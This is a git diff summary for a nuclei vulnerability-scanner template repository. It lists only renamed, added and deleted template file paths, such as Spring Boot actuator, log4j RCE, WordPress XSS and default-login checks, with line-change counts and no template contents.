.../Other/springForShell-CVE-2022-22965.yaml | 32 +- nuclei-templates/Other/spring_collection.yaml | 86 - .../Other/springboot-actuator-10434.yaml | 34 - .../Other/springboot-actuator-10435.yaml | 27 + ...pringboot-actuators-jolokia-xxe-10428.yaml | 27 - ...pringboot-actuators-jolokia-xxe-10429.yaml | 31 + .../Other/springboot-autoconfig-10437.yaml | 28 + .../Other/springboot-autoconfig.yaml | 24 - ...10441.yaml => springboot-beans-10438.yaml} | 0 .../Other/springboot-env-10450.yaml | 34 - .../Other/springboot-env-10451.yaml | 37 + .../Other/springboot-gateway-10453.yaml | 35 - .../Other/springboot-gateway.yaml | 29 + .../Other/springboot-h2-db-rce-10454.yaml | 40 - .../Other/springboot-h2-db-rce-10455.yaml | 37 + .../Other/springboot-health-10460.yaml | 28 - nuclei-templates/Other/springboot-health.yaml | 24 + .../Other/springboot-heapdump-10465.yaml | 60 - .../Other/springboot-httptrace-10468.yaml | 8 +- .../Other/springboot-info-10470.yaml | 31 - nuclei-templates/Other/springboot-info.yaml | 32 + .../Other/springboot-log4j-rce-10472.yaml | 47 - .../Other/springboot-log4j-rce.yaml | 41 + .../Other/springboot-loggers-10475.yaml | 34 + .../Other/springboot-loggers.yaml | 29 - ...78.yaml => springboot-mappings-10480.yaml} | 0 .../Other/springboot-metrics-10483.yaml | 5 +- .../Other/springboot-threaddump-10486.yaml | 37 - .../Other/springboot-threaddump.yaml | 32 + .../Other/springboot-trace-10488.yaml | 36 - .../Other/springboot-trace-10492.yaml | 31 + nuclei-templates/Other/sql-dump-10496.yaml | 46 - nuclei-templates/Other/sql-dump.yaml | 47 + nuclei-templates/Other/sql-monitor-10505.yaml | 20 + nuclei-templates/Other/sql-monitor.yaml | 20 - ...0.yaml => sql-server-reporting-10508.yaml} | 0 .../Other/{sql-injection.yaml => sqli.yaml} | 0 ...sqli_header-10504.yaml => sqliheader.yaml} | 0 ...1).yaml => square-access-token-11867.yaml} | 0 .../Other/square-oauth-secret(1).yaml | 3 - nuclei-templates/Other/square.yaml | 25 + ...squid-analysis-report-generator-10512.yaml | 32 + ...squid-analysis-report-generator-10513.yaml | 37 - .../Other/squirrelmail-add-xss-10515.yaml | 26 - .../Other/squirrelmail-add-xss.yaml | 25 + .../Other/squirrelmail-lfi-10517.yaml | 22 + nuclei-templates/Other/squirrelmail-lfi.yaml | 29 - .../Other/squirrelmail-login-10519.yaml | 12 +- .../squirrelmail-vkeyboard-xss-10522.yaml | 26 + .../Other/squirrelmail-vkeyboard-xss.yaml | 25 - .../Other/ssrf-via-oauth-misconfig-10526.yaml | 30 + .../Other/ssrf-via-oauth-misconfig-10527.yaml | 34 - .../{ssrf-detection.yaml => ssrf_nagli.yaml} | 0 nuclei-templates/Other/ssti-jinja2.yaml | 3 + .../Other/stackstorm-default-login-10529.yaml | 41 + .../Other/stackstorm-default-login-10530.yaml | 41 - .../stem-audio-table-private-keys-10536.yaml | 28 - .../Other/stem-audio-table-private-keys.yaml | 27 + .../Other/strapi-cms-detect-10540.yaml | 3 +- .../Other/strapi-documentation-10542.yaml | 34 + .../Other/strapi-documentation-10543.yaml | 33 - nuclei-templates/Other/strapi-page-10545.yaml | 16 + nuclei-templates/Other/strapi-page.yaml | 19 - .../Other/strikingly-takeover-10552.yaml | 2 +- ...-key(1).yaml => stripe-api-key-11869.yaml} | 0 .../Other/stripe-restricted-key-10555.yaml | 17 - .../Other/stripe-restricted-key.yaml | 15 + ...-key-10558.yaml => stripe-secret-key.yaml} | 0 .../Other/{api-stripe.yaml => stripe.yaml} | 0 .../Other/struts-debug-mode-10560.yaml | 19 + .../Other/struts-debug-mode-10561.yaml | 16 - .../Other/struts-problem-report-10563.yaml | 19 + .../Other/struts-problem-report.yaml | 20 - .../Other/submitty-login-10568.yaml | 2 +- .../Other/sugarcrm-panel-10569.yaml | 27 + .../Other/sugarcrm-panel-10571.yaml | 22 - .../Other/supermicro-default-login-10572.yaml | 39 - .../Other/supermicro-default-login.yaml | 36 + .../Other/superset-default-login-10574.yaml | 67 + .../Other/superset-default-login.yaml | 59 - .../Other/supervpn-panel-10575.yaml | 15 - .../Other/supervpn-panel-10577.yaml | 14 + .../Other/surveygizmo-takeover-10583.yaml | 8 +- .../suspicious-sql-error-messages-10585.yaml | 32 + .../suspicious-sql-error-messages-10586.yaml | 32 - ...-api-10595.yaml => swagger-api-10592.yaml} | 0 nuclei-templates/Other/swagger-ui-bypass.yaml | 83 + .../Other/symantec-dlp-login-10596.yaml | 21 + .../Other/symantec-dlp-login.yaml | 20 - .../Other/symantec-epm-login-10602.yaml | 20 + .../Other/symantec-epm-login.yaml | 21 - .../Other/symantec-ewep-login-10605.yaml | 20 - .../Other/symantec-ewep-login.yaml | 21 + .../symantec-messaging-gateway-10607.yaml | 22 - .../symantec-pgp-global-directory-10611.yaml | 21 + .../symantec-pgp-global-directory-10613.yaml | 20 - .../Other/symfony-database-config-10616.yaml | 28 - .../Other/symfony-database-config-10617.yaml | 17 + .../Other/symfony-debugmode-10618.yaml | 29 - .../Other/symfony-debugmode-10623.yaml | 25 + .../Other/symfony-profiler-10625.yaml | 19 + .../Other/symfony-profiler-10626.yaml | 20 - .../Other/synology-web-station-10631.yaml | 19 - .../Other/synology-web-station-10632.yaml | 24 + nuclei-templates/Other/sysaid-help-desk.yaml | 21 + ...gin.yaml => szhe-default-login-10638.yaml} | 0 .../Other/tableau-panel-10642.yaml | 25 - nuclei-templates/Other/tableau-panel.yaml | 21 + ...amronos iptv\347\263\273\347\273\237.yaml" | 20 + ...ronos-rce-10649.yaml => tamronos-rce.yaml} | 0 .../Other/targa-camera-lfi-10654.yaml | 10 +- .../Other/targa-camera-ssrf-10657.yaml | 23 - nuclei-templates/Other/targa-camera-ssrf.yaml | 22 + nuclei-templates/Other/tcpconfig-10663.yaml | 19 - nuclei-templates/Other/tcpconfig-10665.yaml | 19 + .../teamcity-registration-enabled-10667.yaml | 28 - .../Other/teamcity-registration-enabled.yaml | 30 + .../Other/teamwork-takeover-10669.yaml | 15 + .../Other/teamwork-takeover-10671.yaml | 16 - nuclei-templates/Other/tech-detect-10672.yaml | 2678 - nuclei-templates/Other/tech-detect-10673.yaml | 2730 + .../Other/tectuus-scada-monitor-10682.yaml | 25 - .../Other/tectuus-scada-monitor.yaml | 25 + .../Other/tekon-info-leak-10685.yaml | 36 - nuclei-templates/Other/tekon-info-leak.yaml | 30 + .../telerik-dialoghandler-detect-10688.yaml | 6 +- .../telerik-fileupload-detect-10692.yaml | 17 - .../telerik-fileupload-detect-10694.yaml | 14 + ...{Tenda-leakage.yaml => tenda-leakage.yaml} | 0 ...i-pcoip-10702.yaml => teradici-pcoip.yaml} | 0 .../Other/terraform-detect-10709.yaml | 22 + nuclei-templates/Other/terraform-detect.yaml | 22 - .../terraform-enterprise-panel-10712.yaml | 31 + .../Other/terraform-enterprise-panel.yaml | 27 - nuclei-templates/Other/the-next.yaml | 59 + ...cmf_include.yaml => thinkCMF_include.yaml} | 0 nuclei-templates/Other/thinkcmf-detect.yaml | 20 - .../Other/thinkcmf-detection-10719.yaml | 20 + .../Other/thinkcmf-lfi (copy 1).yaml | 24 - .../Other/thinkcmf-rce-10725.yaml | 24 + .../Other/thinkcmf-rce-10729.yaml | 31 - .../Other/thinkcmf-workflow-10730.yaml | 10 + nuclei-templates/Other/thinkcmf-workflow.yaml | 10 - .../Other/thinkific-redirect-10736.yaml | 24 - .../Other/thinkific-redirect-10737.yaml | 20 + nuclei-templates/Other/thinkphp-2-rce.yaml | 50 +- .../Other/thinkphp-5022-rce-10746.yaml | 27 - .../Other/thinkphp-5022-rce-10747.yaml | 23 + .../Other/thinkphp-5023-rce-10749.yaml | 25 + .../Other/thinkphp-5023-rce-10751.yaml | 32 - ...kphp-509-information-disclosure-10752.yaml | 22 - ...kphp-509-information-disclosure-10753.yaml | 22 + .../Other/threatq-login-10757.yaml | 34 + nuclei-templates/Other/threatq-login.yaml | 29 - .../Other/thumbs-db-disclosure-10761.yaml | 20 + .../Other/thumbs-db-disclosure-10762.yaml | 24 - .../Other/tianqing-info-leak-10765.yaml | 33 + .../Other/tianqing-info-leak.yaml | 28 - ...10769.yaml => tictail-takeover-10768.yaml} | 0 ...idb-unauth-10772.yaml => tidb-unauth.yaml} | 0 .../Other/tikiwiki-cms-10774.yaml | 23 + .../Other/tikiwiki-cms-10775.yaml | 20 - .../Other/tikiwiki-reflected-xss-10777.yaml | 27 + .../Other/tikiwiki-reflected-xss-10779.yaml | 24 - .../Other/tilda-takeover-10781.yaml | 20 + .../Other/tilda-takeover-10782.yaml | 20 - ...gl-10786.yaml => tileserver-gl-10787.yaml} | 0 nuclei-templates/Other/time-based-sqli.yaml | 33 - .../Other/tin-canny-learndash-reporting.yaml | 59 + .../Other/{api-tinypng.yaml => tinypng.yaml} | 0 ...it-web-rce.yaml => titannit-web-ssrf.yaml} | 0 .../Other/tomcat-default-login-10788.yaml | 69 - .../Other/tomcat-default-login-10789.yaml | 65 + ...t-detect.yaml => tomcat-detect-10794.yaml} | 0 .../Other/tomcat-pathnormalization-10799.yaml | 18 + .../Other/tomcat-pathnormalization-10800.yaml | 28 - ...scripts-10801.yaml => tomcat-scripts.yaml} | 0 ...rkflow-10805.yaml => tomcat-workflow.yaml} | 0 .../Other/top-xss-params-10809.yaml | 81 + nuclei-templates/Other/top-xss-params.yaml | 75 - .../Other/tor-socks-proxy-10813.yaml | 4 - nuclei-templates/Other/tos.yaml | 21 + ...etect-10825.yaml => trace-axd-detect.yaml} | 0 .../Other/trace-method-10827.yaml | 26 - .../Other/trace-method-10829.yaml | 27 + .../Other/traefik-dashboard-10832.yaml | 2 + ...-ci-disclosure.yaml => travis-config.yaml} | 0 ...l => trilithic-viewpoint-login-10839.yaml} | 0 ...aml => tugboat-config-exposure-10843.yaml} | 0 ...keover-10845.yaml => tumblr-takeover.yaml} | 0 .../Other/turbocrm-xss-10848.yaml | 26 + .../Other/turbocrm-xss-10850.yaml | 32 - .../tuxedo-connected-controller-10852.yaml | 3 +- .../Other/twig-php-ssti-10856.yaml | 14 - .../Other/twig-php-ssti-10859.yaml | 22 + nuclei-templates/Other/twilio-api-10861.yaml | 16 - nuclei-templates/Other/twilio-api.yaml | 13 + .../Other/twitter-secret-11870.yaml | 13 + nuclei-templates/Other/twitter-secret.yaml | 16 - nuclei-templates/Other/twitter.yaml | 24 + .../Other/txt-fingerprint-10863.yaml | 25 - nuclei-templates/Other/txt-fingerprint.yaml | 18 + .../Other/uberflip-takeover-10864.yaml | 15 + .../Other/uberflip-takeover-10866.yaml | 19 - ...69.yaml => ucmdb-default-login-10868.yaml} | 0 .../Other/ueditor-file-upload-10876.yaml | 1 + .../ultimatemember-open-redirect-10877.yaml | 18 + .../Other/ultimatemember-open-redirect.yaml | 17 - .../Other/umbraco-base-ssrf-10882.yaml | 24 - nuclei-templates/Other/umbraco-base-ssrf.yaml | 25 + nuclei-templates/Other/umbraco.yaml | 90954 -------- ...{unauth-ftp.yaml => unauth-ftp-10942.yaml} | 0 .../Other/unauth-hoteldruid-panel-10943.yaml | 33 - .../Other/unauth-hoteldruid-panel.yaml | 25 + .../Other/unauth-message-read-10945.yaml | 45 - .../Other/unauth-message-read-10946.yaml | 36 + nuclei-templates/Other/unauth-rlm-10960.yaml | 29 + nuclei-templates/Other/unauth-rlm.yaml | 19 - .../Other/unauth-spark-api-10961.yaml | 22 - .../Other/unauth-spark-api-10963.yaml | 30 + .../Other/unauth-wavink-panel-10967.yaml | 40 + .../Other/unauth-wavink-panel.yaml | 37 - .../Other/unauth-xproxy-dashboard-10968.yaml | 27 + .../Other/unauth-xproxy-dashboard.yaml | 23 - .../unauthenticated-alert-manager-10888.yaml | 20 - .../Other/unauthenticated-alert-manager.yaml | 23 + .../Other/unauthenticated-frp-10896.yaml | 26 + .../Other/unauthenticated-frp-10897.yaml | 21 - .../Other/unauthenticated-glances-10898.yaml | 22 - .../Other/unauthenticated-glances.yaml | 21 + .../Other/unauthenticated-glowroot-10900.yaml | 28 + .../Other/unauthenticated-glowroot-10902.yaml | 27 - .../Other/unauthenticated-influxdb-10903.yaml | 27 + .../Other/unauthenticated-influxdb.yaml | 23 - ... => unauthenticated-lansweeper-10906.yaml} | 0 .../unauthenticated-mongo-express-10908.yaml | 24 - .../unauthenticated-mongo-express-10909.yaml | 30 + .../unauthenticated-nacos-access-10912.yaml | 40 + .../Other/unauthenticated-nacos-access.yaml | 34 - .../Other/unauthenticated-netdata-10918.yaml | 31 - .../Other/unauthenticated-netdata.yaml | 26 + .../unauthenticated-popup-upload-10921.yaml | 20 - .../Other/unauthenticated-popup-upload.yaml | 20 + .../Other/unauthenticated-prtg-10926.yaml | 20 - .../Other/unauthenticated-prtg-10927.yaml | 25 + ...thenticated-varnish-cache-purge-10931.yaml | 29 - ...thenticated-varnish-cache-purge-10933.yaml | 25 + .../Other/unauthenticated-zipkin-10935.yaml | 30 - .../Other/unauthenticated-zipkin.yaml | 26 + ...aml => unauthorized-h3csecparh-login.yaml} | 0 ...authorized-hp-officepro-printer-10950.yaml | 24 + .../unauthorized-hp-officepro-printer.yaml | 24 - .../Other/unauthorized-hp-printer-10953.yaml | 4 - .../Other/unauthorized-plastic-scm-10955.yaml | 57 - .../Other/unauthorized-plastic-scm-10957.yaml | 50 + ...ized-puppet-node-manager-detect-10958.yaml | 24 - ...ized-puppet-node-manager-detect-10959.yaml | 20 + ...0970.yaml => unbounce-takeover-10971.yaml} | 0 .../Other/unifi-network-log4j-rce-10975.yaml | 11 +- .../Other/unpatched-coldfusion-10977.yaml | 35 + .../Other/unpatched-coldfusion.yaml | 30 - nuclei-templates/Other/upnp-device-10981.yaml | 30 + nuclei-templates/Other/upnp-device.yaml | 29 - nuclei-templates/Other/ups-status-10985.yaml | 25 + nuclei-templates/Other/ups-status.yaml | 20 - .../Other/uptimerobot-takeover-10987.yaml | 25 - .../Other/uptimerobot-takeover.yaml | 21 + .../Other/urge-takeover-10990.yaml | 18 + nuclei-templates/Other/urge-takeover.yaml | 18 - nuclei-templates/Other/url.yaml | 50 +- ...0994.yaml => vanguard-post-xss-10992.yaml} | 0 ...er-10997.yaml => vend-takeover-10996.yaml} | 0 .../Other/vercel-takeover-11000.yaml | 5 +- .../Other/versa-default-login-11003.yaml | 49 - .../Other/versa-default-login.yaml | 46 + nuclei-templates/Other/versa-sdwan-11005.yaml | 19 - nuclei-templates/Other/versa-sdwan.yaml | 16 + .../Other/video-synchro-pdf-lfi-11007.yaml | 9 +- .../Other/vidyo-default-login-11009.yaml | 67 + .../Other/vidyo-default-login-11010.yaml | 60 - ...1012.yaml => viewlinc-crlf-injection.yaml} | 0 ...aml => viewpoint-system-status-11018.yaml} | 0 ...igor-login.yaml => vigor-login-11023.yaml} | 0 ...024.yaml => virtual-ema-detect-11025.yaml} | 0 nuclei-templates/Other/visualstudio.yaml | 26 + .../Other/vmware-horizon-11040.yaml | 24 - .../Other/vmware-horizon-11041.yaml | 20 + .../vmware-horizon-log4j-jndi-rce-11033.yaml | 37 + .../Other/vmware-horizon-log4j-jndi-rce.yaml | 32 - .../Other/vmware-horizon-panel-11035.yaml | 26 + .../Other/vmware-horizon-panel.yaml | 23 - nuclei-templates/Other/vmware-log4j.yaml | 33 - .../Other/vmware-vcenter-lfi-11048.yaml | 32 - ...042.yaml => vmware-vcenter-lfi-linux.yaml} | 0 .../Other/vmware-vcenter-lfi.yaml | 27 + .../Other/vmware-vcenter-log4j-jndi-rce.yaml | 38 + .../Other/vmware-vcenter-ssrf-11051.yaml | 24 - .../Other/vmware-vcenter-ssrf.yaml | 21 + .../Other/vmware-vrealize-detect.yaml | 43 +- .../Other/vmware-vsphere-web-client.yaml | 19 + nuclei-templates/Other/vmware-workflow.yaml | 2 +- nuclei-templates/Other/vnc-detect-11061.yaml | 4 - ...4.yaml => voipmonitor-workflow-11065.yaml} | 0 nuclei-templates/Other/voiprce(1).yaml | 38 - .../Other/vpms-auth-bypass-11066.yaml | 35 + nuclei-templates/Other/vpms-auth-bypass.yaml | 31 - .../vrealize-operations-log4j-rce-11070.yaml | 17 +- .../Other/vsftpd-detection-11074.yaml | 17 + nuclei-templates/Other/vsftpd-detection.yaml | 17 - ...1.yaml => w3c-total-cache-ssrf-11077.yaml} | 0 ...adl-api-11085.yaml => wadl-api-11082.yaml} | 0 .../Other/wago-plc-panel-11093.yaml | 25 + nuclei-templates/Other/wago-plc-panel.yaml | 22 - .../wallix-accessmanager-panel-11095.yaml | 34 + .../Other/wallix-accessmanager-panel.yaml | 29 - .../wamp-server-configuration-11096.yaml | 44 +- .../Other/wamp-xdebug-detect-11104.yaml | 20 - .../Other/wamp-xdebug-detect.yaml | 17 + ...-rce-2.yaml => wangkang-NS-ASG-rce-2.yaml} | 0 ...g-NGFW-rce.yaml => wangkang-ngfw-rce.yaml} | 0 ...tchguard-credentials-disclosure-11107.yaml | 32 - .../watchguard-credentials-disclosure.yaml | 27 + .../Other/watchguard-panel-11108.yaml | 22 + nuclei-templates/Other/watchguard-panel.yaml | 21 - .../Other/wazuh-detect-11111.yaml | 25 + .../Other/wazuh-detect-11112.yaml | 22 - nuclei-templates/Other/wazuh-panel-11113.yaml | 34 + nuclei-templates/Other/wazuh-panel.yaml | 33 - nuclei-templates/Other/web-config-11126.yaml | 24 + nuclei-templates/Other/web-config-11127.yaml | 19 - .../Other/web-ftp-detect-11138.yaml | 23 + nuclei-templates/Other/web-ftp-detect.yaml | 20 - .../Other/web-suite-detect-11168.yaml | 36 + nuclei-templates/Other/web-suite-detect.yaml | 31 - nuclei-templates/Other/webcamxp-5-11122.yaml | 22 - nuclei-templates/Other/webcamxp-5.yaml | 21 + ...itors-11128.yaml => webeditors-11130.yaml} | 0 .../Other/webflow-takeover-11133.yaml | 19 + .../Other/webflow-takeover-11134.yaml | 15 - ...-11142.yaml => weblogic-detect-11144.yaml} | 0 .../Other/weblogic-iiop-detect-11147.yaml | 24 + .../Other/weblogic-iiop-detect-11148.yaml | 20 - .../Other/weblogic-login-11149.yaml | 25 - nuclei-templates/Other/weblogic-login.yaml | 25 + .../Other/weblogic-t3-detect-11151.yaml | 38 - .../Other/weblogic-t3-detect.yaml | 41 + .../Other/weblogic-weak-login.yaml | 13 +- ...min-panel-11158.yaml => webmin-panel.yaml} | 0 .../Other/webmodule-ee-11162.yaml | 22 + .../Other/webmodule-ee-11164.yaml | 19 - .../Other/webmodule-ee-panel-11161.yaml | 33 + .../Other/webmodule-ee-panel.yaml | 28 - ...talk-leakage.yaml => webtalk-leakage.yaml} | 0 .../Other/webtools-home-11169.yaml | 20 + nuclei-templates/Other/webtools-home.yaml | 20 - nuclei-templates/Other/webui-rce-11170.yaml | 32 - nuclei-templates/Other/webui-rce-11172.yaml | 26 + ...webview-addjavascript-interface-11175.yaml | 12 - ...webview-addjavascript-interface-11177.yaml | 16 + ...11181.yaml => webview-load-url-11182.yaml} | 0 .../Other/webview-universal-access-11185.yaml | 16 - .../Other/webview-universal-access.yaml | 13 + ...ekender-newspaper-open-redirect-11188.yaml | 18 + .../weekender-newspaper-open-redirect.yaml | 18 - .../Other/weiphp-sql-injection-11189.yaml | 23 + .../Other/weiphp-sql-injection.yaml | 24 - .../Other/wems-manager-xss-11192.yaml | 25 + .../Other/wems-manager-xss-11194.yaml | 29 - .../Other/werkzeug-debugger-detect-11196.yaml | 6 +- .../Other/wildfly-panel-11209.yaml | 23 + nuclei-templates/Other/wildfly-panel.yaml | 19 - ...xss-11213.yaml => window-name-domxss.yaml} | 0 nuclei-templates/Other/wireless-leakage.yaml | 6 +- .../Other/wix-takeover-11219.yaml | 23 + nuclei-templates/Other/wix-takeover.yaml | 22 - ...etect-11223.yaml => wondercms-detect.yaml} | 0 .../Other/wooyun-2015-148227(1).yaml | 12 +- .../Other/wooyun-2015-148227-11225.yaml | 24 - .../Other/wooyun-path-traversal-11229.yaml | 30 + .../Other/wooyun-path-traversal.yaml | 26 - nuclei-templates/Other/wordpress-LFI.yaml | 21 + .../wordpress-accessible-wpconfig-11234.yaml | 38 - .../wordpress-accessible-wpconfig-11235.yaml | 48 + .../wordpress-affiliatewp-log-11240.yaml | 1 + ...ordpress-bbpress-plugin-listing-11245.yaml | 27 - .../wordpress-bbpress-plugin-listing.yaml | 23 + .../wordpress-db-backup-listing-11250.yaml | 6 +- .../Other/wordpress-db-repair-11252.yaml | 5 + .../Other/wordpress-debug-log-11259.yaml | 25 - .../Other/wordpress-debug-log.yaml | 43 + .../Other/wordpress-detect-11261.yaml | 40 - nuclei-templates/Other/wordpress-detect.yaml | 34 + .../wordpress-directory-listing-11265.yaml | 21 - .../wordpress-directory-listing-11266.yaml | 25 + ...dpress-elementor-plugin-listing-11269.yaml | 7 +- ...emails-verification-for-woocommerce-1.yaml | 29 - .../wordpress-emergency-script-11277.yaml | 27 - .../Other/wordpress-emergency-script.yaml | 23 + .../Other/wordpress-git-config-11279.yaml | 8 +- ...press-gtranslate-plugin-listing-11282.yaml | 23 - ...press-gtranslate-plugin-listing-11284.yaml | 22 + ...ordpress-infinitewp-auth-bypass-11285.yaml | 50 - ...ordpress-infinitewp-auth-bypass-11288.yaml | 59 + .../Other/wordpress-installer-log-11290.yaml | 21 - .../Other/wordpress-installer-log.yaml | 19 + nuclei-templates/Other/wordpress-lfi.yaml | 25 - .../Other/wordpress-plugins-detect.yaml | 42 + .../Other/wordpress-plugins2.yaml | 27 - .../wordpress-rce-simplefilelist-11302.yaml | 68 - .../wordpress-rce-simplefilelist-11304.yaml | 73 + .../Other/wordpress-rdf-user-enum.yaml | 39 + ...ress-redirection-plugin-listing-11306.yaml | 23 - ...ress-redirection-plugin-listing-11308.yaml | 27 + .../Other/wordpress-takeover-11312.yaml | 23 - .../Other/wordpress-takeover-11313.yaml | 26 + ...aml => wordpress-themes-detect-11316.yaml} | 0 .../Other/wordpress-tmm-db-migrate.yaml | 6 +- .../Other/wordpress-user-enum-11330.yaml | 28 + .../Other/wordpress-user-enum.yaml | 24 - .../wordpress-user-enumeration-11329.yaml | 17 - .../Other/wordpress-user-enumeration.yaml | 19 + .../wordpress-weak-credentials-11334.yaml | 50 + .../Other/wordpress-weak-credentials.yaml | 33 - .../wordpress-woocommerce-listing-11339.yaml | 26 + .../wordpress-woocommerce-listing-11341.yaml | 22 - .../wordpress-woocommerce-sqli-11345.yaml | 43 - .../Other/wordpress-woocommerce-sqli.yaml | 30 + .../Other/wordpress-wordfence-lfi-11351.yaml | 9 +- ...dpress-wordfence-waf-bypass-xss-11353.yaml | 25 - ...dpress-wordfence-waf-bypass-xss-11356.yaml | 24 + .../Other/wordpress-wordfence-xss-11357.yaml | 14 - .../Other/wordpress-wordfence-xss-11362.yaml | 28 + .../Other/wordpress-workflow (copy 1).yaml | 26 +- ...press-wpcourses-info-disclosure-11371.yaml | 34 - .../wordpress-wpcourses-info-disclosure.yaml | 31 + ...> wordpress-xmlrpc-listmethods-11372.yaml} | 0 .../Other/wordpress-zebra-form-xss-11375.yaml | 38 + .../Other/wordpress-zebra-form-xss-11377.yaml | 34 - .../Other/workresources-rdp-11382.yaml | 24 - nuclei-templates/Other/workresources-rdp.yaml | 20 + ...84.yaml => worksites-detection-11383.yaml} | 0 .../Other/worksites-takeover.yaml | 3 +- .../Other/wowza-streaming-engine-11395.yaml | 20 + .../Other/wowza-streaming-engine-11398.yaml | 23 - .../Other/wp-adaptive-xss-11403.yaml | 5 + ...1405.yaml => wp-altair-listing-11406.yaml} | 0 nuclei-templates/Other/wp-app-log-11413.yaml | 31 + nuclei-templates/Other/wp-app-log.yaml | 25 - ...ing.yaml => wp-arforms-listing-11415.yaml} | 0 .../Other/wp-church-admin-xss-11419.yaml | 30 + .../Other/wp-church-admin-xss-11420.yaml | 29 - .../Other/wp-code-snippets-xss-11425.yaml | 46 - .../Other/wp-code-snippets-xss-11426.yaml | 35 + .../Other/wp-config-setup-11427.yaml | 20 + nuclei-templates/Other/wp-config-setup.yaml | 19 - .../Other/wp-custom-tables-xss-11433.yaml | 25 + .../Other/wp-custom-tables-xss-11434.yaml | 31 - .../Other/wp-detect (copy 1).yaml | 18 - nuclei-templates/Other/wp-detect.yaml | 19 + ...> wp-email-subscribers-listing-11443.yaml} | 0 nuclei-templates/Other/wp-engine-config.yaml | 22 - .../Other/wp-finder-xss-11450.yaml | 8 +- .../Other/wp-flagem-xss-11453.yaml | 24 + nuclei-templates/Other/wp-flagem-xss.yaml | 25 - ...1457.yaml => wp-full-path-disclosure.yaml} | 0 .../Other/wp-grimag-open-redirect.yaml | 8 +- .../wp-gtranslate-open-redirect-11463.yaml | 3 + .../Other/wp-haberadam-idor-11467.yaml | 38 - .../Other/wp-haberadam-idor-11468.yaml | 32 + .../wp-idx-broker-platinum-listing-11469.yaml | 9 +- ...{wp-install-11475.yaml => wp-install.yaml} | 0 .../Other/wp-iwp-client-listing.yaml | 5 +- .../Other/wp-javospot-lfi-11480.yaml | 26 - .../Other/wp-javospot-lfi-11482.yaml | 36 + .../Other/wp-knews-xss-11487.yaml | 8 +- .../Other/wp-license-file-11489.yaml | 4 - .../wp-mailchimp-log-exposure-11492.yaml | 23 + .../wp-mailchimp-log-exposure-11494.yaml | 28 - nuclei-templates/Other/wp-misconfig.yaml | 36 - .../Other/wp-mstore-plugin-listing-11501.yaml | 23 - .../Other/wp-mstore-plugin-listing.yaml | 27 + .../Other/wp-multiple-theme-ssrf-11511.yaml | 6 +- .../Other/wp-nextgen-xss-11516.yaml | 25 - .../Other/wp-nextgen-xss-11518.yaml | 24 + .../Other/wp-oxygen-theme-lfi-11522.yaml | 24 + .../Other/wp-oxygen-theme-lfi-11523.yaml | 30 - .../Other/wp-phpfreechat-xss-11527.yaml | 24 - .../Other/wp-phpfreechat-xss-11528.yaml | 29 + .../wp-plugin-1-flashgallery-listing.yaml | 4 + .../Other/wp-plugin-lifterlms-11533.yaml | 23 + .../Other/wp-plugin-lifterlms.yaml | 22 - .../wp-plugin-marmoset-viewer-xss-11537.yaml | 26 + .../wp-plugin-marmoset-viewer-xss-11538.yaml | 22 - .../wp-plugin-utlimate-member-11539.yaml | 27 - .../wp-plugin-utlimate-member-11541.yaml | 22 + nuclei-templates/Other/wp-popup-listing.yaml | 2 +- ...l => wp-prostore-open-redirect-11549.yaml} | 0 .../Other/wp-qards-listing-11551.yaml | 25 + .../Other/wp-qards-listing-11552.yaml | 21 - .../wp-revslider-file-download-11555.yaml | 14 +- .../Other/wp-securimage-xss-11556.yaml | 30 + nuclei-templates/Other/wp-securimage-xss.yaml | 24 - .../wp-security-open-redirect-11561.yaml | 21 + .../Other/wp-security-open-redirect.yaml | 21 - .../Other/wp-sfwd-lms-listing-11564.yaml | 2 +- .../Other/wp-slideshow-xss-11575.yaml | 29 + .../Other/wp-slideshow-xss-11576.yaml | 28 - .../Other/wp-socialfit-xss-11580.yaml | 29 - .../Other/wp-socialfit-xss-11581.yaml | 35 + ...s-11587.yaml => wp-super-forms-11585.yaml} | 0 .../Other/wp-tinymce-lfi-11589.yaml | 25 + .../Other/wp-tinymce-lfi-11591.yaml | 31 - .../Other/wp-tutor-lfi-11598.yaml | 16 - nuclei-templates/Other/wp-tutor-lfi.yaml | 17 + .../Other/wp-upload-data-11602.yaml | 36 + .../Other/wp-upload-data-11605.yaml | 29 - nuclei-templates/Other/wp-userenum.yaml | 93 + .../Other/wp-vault-lfi-11611.yaml | 19 - .../Other/wp-whmcs-xss-11614.yaml | 42 - nuclei-templates/Other/wp-whmcs-xss.yaml | 37 + .../wp-woocommerce-email-verification-1.yaml | 31 + ...-woocommerce-email-verification-11616.yaml | 29 + ...-woocommerce-email-verification-11619.yaml | 34 - ...-11624.yaml => wp-xmlrpc-brute-force.yaml} | 0 .../wp-xmlrpc-pingback-detection-11628.yaml | 3 - .../Other/wpdm-cache-session-11438.yaml | 27 + .../Other/wpdm-cache-session-11439.yaml | 23 - .../Other/wpengine-config-check.yaml | 22 + .../Other/wpmudev-my-calender-xss-11502.yaml | 29 + .../Other/wpmudev-my-calender-xss-11503.yaml | 24 - .../Other/wpmudev-pub-keys-11507.yaml | 24 - nuclei-templates/Other/wpmudev-pub-keys.yaml | 26 + ....yaml => wptouch-open-redirect-11594.yaml} | 0 .../Other/wptouch-plugin-open-redirect.yaml | 19 - nuclei-templates/Other/wsdl-api-11632.yaml | 17 + nuclei-templates/Other/wsdl-api.yaml | 15 - .../Other/wso2-2019-0598-11635.yaml | 28 - .../Other/wso2-2019-0598-11636.yaml | 24 + ...yaml => wso2-apimanager-detect-11638.yaml} | 0 .../Other/wso2-default-login-11641.yaml | 38 + .../Other/wso2-default-login-11643.yaml | 42 - .../Other/wso2-management-console-11644.yaml | 30 + .../Other/wso2-management-console.yaml | 19 - nuclei-templates/Other/wso2mgmtconsole.yaml | 4 - .../Other/wufoo-takeover-11649.yaml | 21 + .../Other/wufoo-takeover-11651.yaml | 17 - ...-11654.yaml => wuzhicms-detect-11655.yaml} | 0 .../Other/wuzhicms-sqli-11658.yaml | 23 + nuclei-templates/Other/wuzhicms-sqli.yaml | 23 - .../Other/xampp-default-page-11662.yaml | 4 - nuclei-templates/Other/xdcms-sqli-11667.yaml | 37 + nuclei-templates/Other/xdcms-sqli.yaml | 31 - ...ro-login-11673.yaml => xenforo-login.yaml} | 0 .../Other/xenmobile-login-11675.yaml | 23 - nuclei-templates/Other/xenmobile-login.yaml | 19 + .../Other/xerox-efi-lfi-11681.yaml | 28 + nuclei-templates/Other/xerox-efi-lfi.yaml | 33 - .../Other/xerox7-default-login-11680.yaml | 48 + .../Other/xerox7-default-login.yaml | 46 - .../Other/xmlrpc-pingback-ssrf-11687.yaml | 39 + .../Other/xmlrpc-pingback-ssrf.yaml | 28 - 